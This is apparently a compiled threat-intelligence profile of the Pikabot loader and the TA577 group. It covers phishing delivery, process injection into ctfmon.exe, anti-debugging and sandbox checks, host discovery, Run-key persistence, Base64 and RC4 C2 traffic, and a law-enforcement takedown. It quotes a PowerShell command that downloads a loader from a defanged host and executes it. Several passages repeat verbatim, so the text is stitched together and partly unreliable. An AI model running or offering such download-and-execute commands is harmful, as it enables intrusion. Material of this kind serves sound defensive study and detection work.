Pikabot

TA577, are a Russia-based threat group that have been reported to deliver payloads including Qbot, IcedID, SystemBC, SmokeLoader, Ursnif, and Cobalt Strike in ongoing phishing campaigns since 2020. More recently, they have delivered Pikabot and DarkGate malware.

The content repeatedly describes threat actors and malware being delivered through phishing or spearphishing emails containing malicious attachments such as Microsoft Office documents, PDFs, RAR/ZIP archives, CHM, ISO, IMG, HTA, LNK, and executable files disguised as documents.

In terms of the core bot functionality, it is similar to previous versions: executing commands... Command-line execution with output

showing the next sequence to download and execute PIKABOT’s loader using PowerShell... "powershell Invoke-WebRequest https://gloverstech[.]com/tJWz9/0.2343379541861872.dat -OutFile %SYSTEMDRIVE%\\Users\\Public\\Jrdhtjydhjf.exe; saps %SYSTEMDRIVE%\\Users\\Public\\Jrdhtjydhjf.exe"

During the 2016 Ukraine Electric Power Attack, Sandworm Team used the xp_cmdshell command in MS-SQL. During the 2025 Poland Wiper Attacks, the adversaries leveraged PsExec to run cmd.exe commands on multiple victim machines. Numerous malware families and groups are described as using cmd.exe, cmd /c, Windows command shell, or command-line interfaces to execute commands, payloads, reconnaissance, persistence, cleanup, and ransomware actions.

Examples include 'Cobalt Group has used a JavaScript backdoor that is capable of launching cmd.exe to execute shell commands', 'Orz can execute commands with JavaScript', 'Patchwork used JavaScript code and .SCT files on victim machines', and 'Water Curupira Pikabot Distribution installation via JavaScript will launch follow-on commands via cmd.exe.'

The malware utilizes specific NTDLL Zw APIs for a variety of operations, including debugger detection, process creation, and injection... It executes syscalls directly, bypassing conventional API calls

The content repeatedly describes victims being lured into opening malicious attachments, enabling macros, launching installers, clicking embedded files/links, or otherwise directly executing malicious content.

This new campaign on February 8th involved emails with hyperlinks that led to ZIP archive files containing a malicious obfuscated Javascript script.

Sandworm Team leveraged Microsoft Office attachments which contained malicious macros that were automatically executed once the user permitted them... APT29 has used various forms of spearphishing attempting to get a user to open attachments... DarkGate is distributed through phishing links to VBS or MSI objects requiring user interaction for execution.

0x246F Creates file on disk and modifies registry tied to configuration

The loader creates a suspended instance of ctfmon.exe using the ZwCreateUserProcess syscall, a tactic designed to masquerade as a legitimate Windows process.

The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, .lnk files, or .bat files in the Windows Startup folder.

The content repeatedly references malicious shortcut files: e.g., "APT38 has used malicious Word documents and shortcut files," "Bumblebee... opening an ISO file to enable execution of malicious shortcut files and DLLs," and "Mustang Panda distributed malicious LNK objects for user execution."

The loader creates a suspended instance of ctfmon.exe... allocates a large memory region remotely... writes the PIKABOT core... redirects the execution flow from ctfmon.exe to the malicious PIKABOT core by calling the SetContextThread API

The loader creates a suspended instance of ctfmon.exe using the ZwCreateUserProcess syscall, a tactic designed to masquerade as a legitimate Windows process.

The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, .lnk files, or .bat files in the Windows Startup folder.

The content repeatedly references malicious shortcut files: e.g., "APT38 has used malicious Word documents and shortcut files," "Bumblebee... opening an ISO file to enable execution of malicious shortcut files and DLLs," and "Mustang Panda distributed malicious LNK objects for user execution."

The malicious code employs heavy obfuscation, utilizing a technique where a jump ( JMP ) follows each assembly instruction.

Lazarus Group has distributed malicious payloads embedded in PNG files.

To appear authentic, the developer tampered with a legitimate search and replace tool called grepWinNP3.exe

The loader creates a suspended instance of ctfmon.exe... allocates a large memory region remotely... writes the PIKABOT core... redirects the execution flow from ctfmon.exe to the malicious PIKABOT core by calling the SetContextThread API

The content repeatedly describes malware and threat actors decoding, decrypting, deobfuscating, or unpacking payloads, strings, configuration data, commands, and C2 responses prior to execution or use.

Gets the window dimensions using GetWindowRect used to identify sandbox environments

The next step of the process is to reflectively load the PE file within the confines of the currently executing process.

The malware employs a series of anti-debugging techniques designed to thwart detection by debugging and forensic tools.

0x246F Creates file on disk and modifies registry tied to configuration

The content repeatedly describes malware and threat actors using commands and APIs such as ipconfig /all, ifconfig, arp -a, route print, nbtstat, netsh, GetAdaptersInfo, and GetIpNetTable to gather IP addresses, MAC addresses, DNS, DHCP, gateways, routing tables, ARP cache, proxy settings, domains, and network adapter/interface details.

Retrieves the name of the user associated with the PIKABOT thread

Uses CreateToolhelp32Snapshot to retrieve process information

The next phase involves collecting victim machine information... Retrieves the computer name Gets processor information... Collects current usage around physical and virtual memory... Retrieves Windows OS product information

Retrieves domain controller information using DsGetDcNameW

Gets the window dimensions using GetWindowRect used to identify sandbox environments

it validates the victim machine by verifying the language identifier using GetUserDefaultLangID . If the LangID is set to Russian ( 0x419 ) or Ukranian ( 0x422 ), the malware will immediately stop its execution.

The malware employs a series of anti-debugging techniques designed to thwart detection by debugging and forensic tools.

Water Curupira Pikabot Distribution initial delivery included obfuscated JavaScript objects stored in password-protected ZIP archives.

Cobian RAT obfuscates communications with the C2 server using Base64 encoding... Daserf uses custom base64 encoding to obfuscate HTTP traffic... Pikabot uses base64 encoding in conjunction with symmetric encryption mechanisms to obfuscate command and control communications.

International law enforcement agencies and their partners have once again joined forces to disrupt and dismantle botnet infrastructure and their operators. | This effort targeted multiple botnets, such as IcedID, Smokeloader, SystemBC, Pikabot, and Bumblebee, as well as their operators.

PIKABOT performs network communication over HTTPS on non-traditional ports (2967, 2223, etc)

As SocGholish, StealC, and Amadey are typically used as droppers or loaders during attacks, they are used to establish access as part of a link in a larger attack chain.

C2 traffic from ADVSTORESHELL is encrypted, then encoded with Base64 encoding... APT19 HTTP malware variant used Base64 to encode communications to the C2 server... APT33 has used base64 to encode command and control traffic.

On this initial check-in request to the C2 server, PIKABOT registers the bot while sending the previously collected information encrypted with RC4.

ADVSTORESHELL exfiltrates data over the same channel used for C2... Agrius exfiltrated staged data using tools such as Putty and WinSCP, communicating with command and control servers... numerous malware and groups sent victim data, files, credentials, or host information over existing C2 channels.